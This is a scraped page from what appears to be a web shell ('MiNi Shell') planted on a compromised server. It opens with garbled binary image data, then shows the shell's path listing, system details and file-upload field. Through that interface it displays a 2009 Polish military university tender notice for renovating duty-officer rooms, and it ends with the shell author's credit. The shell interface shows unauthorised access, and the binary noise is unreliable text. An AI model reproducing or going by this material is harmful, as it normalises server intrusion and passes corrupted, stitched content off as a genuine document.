JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161815-N-2009.html

<p class="kh_header"><b>Warszawa: REMONT POMIESZCZEŃ OFICERA DYŻURNEGO 
W BUDYNKU NR 100</b><br>
<b>Numer ogłoszenia: 161815 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowa Akademia Techniczna , ul. Kaliskiego 2, 00-908 Warszawa, woj. mazowieckie, tel. 022 6837865, faks 022 6837977.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wat.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ OFICERA DYŻURNEGO 
W BUDYNKU NR 100.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest remont pomieszczeń Oficera Dyżurnego w budynku nr 100.         
      W ramach prac budowlanych przewiduje się wykonanie remontu pomieszczeń i korytarza:   
na parterze blok VIII pomieszczenia nr 98, 97, 96, 96a obejmujący:
- wymianę sufitu podwieszonego w pomieszczeniach pełnienia służby oficera dyżurnego,
- montaż sufitu podwieszonego w korytarzu,
- wymianę paneli ściennych,
- montaż panela kancelaryjnego z wypełnieniem izolującym,
- wymiana stolarki okiennej i drzwiowej,
- zabezpieczenie przewodów kominowych,
-wykonanie nowych powłok malarskich,
-wymiana starych podłóg.       
Zakres robót obejmuje remont korytarza i pomieszczeń w celu przystosowania ich dla oficera dyżurnego w czasie pełnienia służby oraz odpoczynku zgodnie z instrukcją o ochronie obiektów wojskowych w Wojskowej Akademii Technicznej.
W ramach prac przy instalacji elektrycznej przewiduje się wykonanie następujących robót:
    Wykonanie instalacji elektrycznej w 10-ciu pomieszczeniach (pomieszczenie oficera dyżurnego i pomieszczenia pomocnicze). Istniejąca instalacja elektryczna wraz z tablicą zabezpieczeniową podlega całkowitemu demontażowi.
     Nowa tablica zabezpieczeniowa została usytuowana w korytarzu przylegającym do pomieszczenia oficera dyżurnego. Z niej zostaną wyprowadzone obwody do oświetlenia, gniazd 230V i klimatyzatorów. 
    Instalację odbiorczą wykonać przewodami kabelkowymi p/t oraz w korytach kablowych w przestrzeni stropowej. W przestrzeni stropowej stosować puszki hermetyczne, mocowane do ścianki bocznej koryta kablowego. Część gniazd 230V będzie zasilana przez UPS (istniejący) zgodnie z rysunkiem schematu ideowego tablicy. Oprawy oświetleniowe mocować w stropie podwieszanym 4x18W z rastrem parabolicznym. Łączniki oświetleniowe na wysokości 1,4m od podłogi. 
Gniazda 230V, zarówno poczwórne jak i podwójne, instalować wg wskazań Użytkownika. Zostanie to uzgodnione w trakcie wykonywania robót.
Po wykonaniu robót, poprawność ich wykonania sprawdzić na drodze pomiaru, a wyniki przedstawić w protokołach. 
W ramach prac sanitarnych przewiduje się :
-remont instalacji wod-kan, demontaż przyborów toaletowych i montaż nowych 
-prace poinstalacyjne
2. Zamawiający dopuszcza zmianę kierownika budowy ze strony Wykonawcy oraz koordynatora w zakresie realizacji obowiązków umownych i inspektorów nadzoru ze strony Zamawiającego wskazanych w umowie, w sytuacji nieprzewidzianej takiej jak np.: zgon, wyjazd za granicę, choroba, rozwiązanie stosunku pracy, zmiana miejsca zamieszkania. 
3. Zamawiający dopuszcza możliwość wystąpienia robót dodatkowych, zamiennych lub zaniechania części robót występujących w zamówieniu. Roboty powyższe winny wynikać z okoliczności, których nie dało się przewidzieć.
4. Konieczność wykonania robót dodatkowych lub zamiennych musi być opisana w protokole konieczności robót.
5. Zamawiający może udzielić dotychczasowemu wykonawcy robót budowlanych zamówień dodatkowych stosownie do art. 67 ust.1 pkt 5 ustawy - Prawo zamówień publicznych, nieobjętych zamówieniem podstawowym i nie przekraczających łącznie 50% wartości realizowanego zamówienia, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
a) z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów;
b) wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego;
6. Roboty dodatkowe mogą być wykonane po zawarciu umowy na ich wykonanie, które będzie poprzedzone negocjacjami Zamawiającego z Wykonawcą..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.33.20.00-3, 45.31.43.20-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia publicznego jest  zobowiązany wnieść, na czas związania ofertą, wadium w wysokości 6.000,00  zł (sześć tysięcy złotych)  przed upływem terminu składania ofert tj.:  do dnia 15.10.2009r. do godz.09:00.
W zależności od wyboru Wykonawcy, wadium może być wniesione:
1) w pieniądzu - przelewem na konto Zamawiającego: PEKAO S.A. Warszawa, ul. Towarowa 25, Nr 34 1240 5918  1111 0000 4910 0228.z dopiskiem: Wadium na remont pomieszczeń Oficera Dyżurnego w budynku nr 100;
Skuteczne wniesienie wadium przelewem oznacza obecność wymaganej kwoty wadium na koncie Zamawiającego w wyżej wymienionym terminie, czyli  datą wpłaty wadium jest data wpływu na konto, a nie data złożenia przelewu.
2) w formie dopuszczonej przez art. 45 ust. 6 pkt 2-5 Prawa zamówień publicznych  - dowodem wniesienia wadium będzie załączony do oferty oryginał lub kopia tego dokumentu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy którzy:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2) Posiadają niezbędną wiedzą i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24  Prawa zamówień publicznych.
Sposób dokonywania oceny ww. warunków będzie odbywał się wg zasady spełnia/nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, których wykaz został określony w poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane dla potwierdzenia w.w. warunków:
1) Oświadczenie, że Wykonawca spełnia wymogi określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 2 do SIWZ. 
W przypadku składania oferty przez konsorcjum, należy składać Oświadczenie stanowiące załącznik nr 2A do SIWZ. Powyższe oświadczenie składa lider konsorcjum oraz podpisuje każdy z podmiotów występujących wspólnie, łącznie z liderem konsorcjum.
2) Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: wypełniony Wykaz osób, które będą kierowały realizacją zamówienia stanowiący załącznik Nr 3 do SIWZ wraz z kopiami: uprawnień budowlanych do kierowania pracami budowlanymi w poszczególnych branżach, aktualnych zaświadczeń o przynależności do Państwowej Izby Inżynierów Budownictwa (PIIB). 
4) Wykaz osób realizujących przedmiot zamówienia posiadających poświadczenie bezpieczeństwa do klauzuli co najmniej zastrzeżone oraz aktualny wyciąg (z ostatnich 3 miesięcy) z Krajowego Rejestru Karnego o nie karalności - zał. Nr 3A do SIWZ.
5) Wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, (co najmniej jedna robota budowlana obejmująca roboty odpowiadające rodzajem robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż wartość złożonej oferty) z podaniem ich wartości z podatkiem VAT, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - Zał. Nr 3B do SIWZ.
6)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
7) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Oferta składana przez Wykonawcę winna również zawierać:
1) Formularz ofertowy stanowiący załącznik nr 1 do SIWZ,
2) Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej wraz z zestawieniem materiałów i sprzętu w oparciu o załączone do SIWZ przedmiary robót,
3) pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z załączonych dokumentów wymaganych postanowieniami SIWZ.
4) oryginał lub kopię poręczeń lub gwarancji stanowiących dowód wniesienia wadium w tych formach. Przy wniesieniu wadium w formie pieniężnej na rachunek Zamawiającego zaleca się załączyć kopię przelewu. Brak w ofercie kopii przelewu nie będzie podstawą do odrzucenia oferty. Natomiast brak wniesienia wadium w terminie będzie skutkowało wykluczeniem wykonawcy z przedmiotowego postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wat.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych, 01-476 Warszawa, ul. Gen. Sylwestra Kaliskiego 11A, Dom Studencki Nr 3, (wejście od ulicy Kocjana) od poniedziałku do piątku w godz. 10:00-13:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 09:00, miejsce: Wojskowa Akademia Techniczna im. Jarosława Dąbrowskiego, 00-908 Warszawa, skr. poczt. 50, ul. Gen. Sylwestra Kaliskiego 2 z terminem doręczenia do dnia 15/10/2009r. do godz. 9:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com